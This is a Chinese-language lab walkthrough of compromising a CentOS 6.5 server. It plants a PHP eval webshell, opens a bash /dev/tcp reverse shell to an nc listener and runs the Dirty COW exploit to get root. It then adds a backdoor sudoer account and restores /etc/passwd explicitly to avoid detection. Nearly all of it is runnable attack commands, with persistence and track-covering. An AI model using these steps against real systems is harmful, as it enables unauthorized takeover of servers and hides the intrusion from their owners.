实验环境:Centos6.5、ssh
实验步骤:
一、搭建实验环境
1.利用ssh连接Centos进行远程操作,在Centos6.5上安装http和php,输入yum -y install httpd php
2.启动http,进入etc/init.d目录,输入:./httpd start
3.关掉selinux,输入:setenforce 0
4.在var/www/html目录下写一个一句话木马文件,内容为:<?php @eval($_REQUEST[666]);?>
二、进行提权
1.利用中国菜刀连接Centos,打开虚拟终端
2.获取交互式shell,输入:bash -i >& /dev/tcp/自己的ip/自己的端口 0>&1,并在cmd中利用nc开启监听的端口号,交互成功
3.利用uname -a命令查看系统的内核系统
4.从网上查找与该系统相对应的漏洞,这里用脏牛漏洞实现提权,从github上下载脏牛,下载链接:https://github .com/FireFart/dirtycow
5.将该exp利用菜刀上传至tmp目录下(该目录可读可写可执行)
6.进入tmp目录下进行编译:gcc -pthread dirty.c -o dirty -lcrypt(注意:如果linux上没有安装gcc,我们可以另找一台机器,最好内核和操作系统版本,系统位数都和目标机一致),编译之后会出现一个新文件
7.执行该文件,输入:./dirty 123456会创建一个firefart用户,密码是123456(就是root用户)
8.使用firefart用户进行远程登录
9.创建新用户xx,输入useradd xx,并将该用户添加到管理员组:gpasswd -a xx wheel
10.修改配置文件:vi /etc/sudoers,将105行注释去掉,此时xx也有了root权限,实现了提权
11.防止被发现,将自动备份的/tmp/passwd.bak覆盖etc/passwd,输入:mv /tmp/passwd.bak /etc/passwd,即可恢复之前的root权限
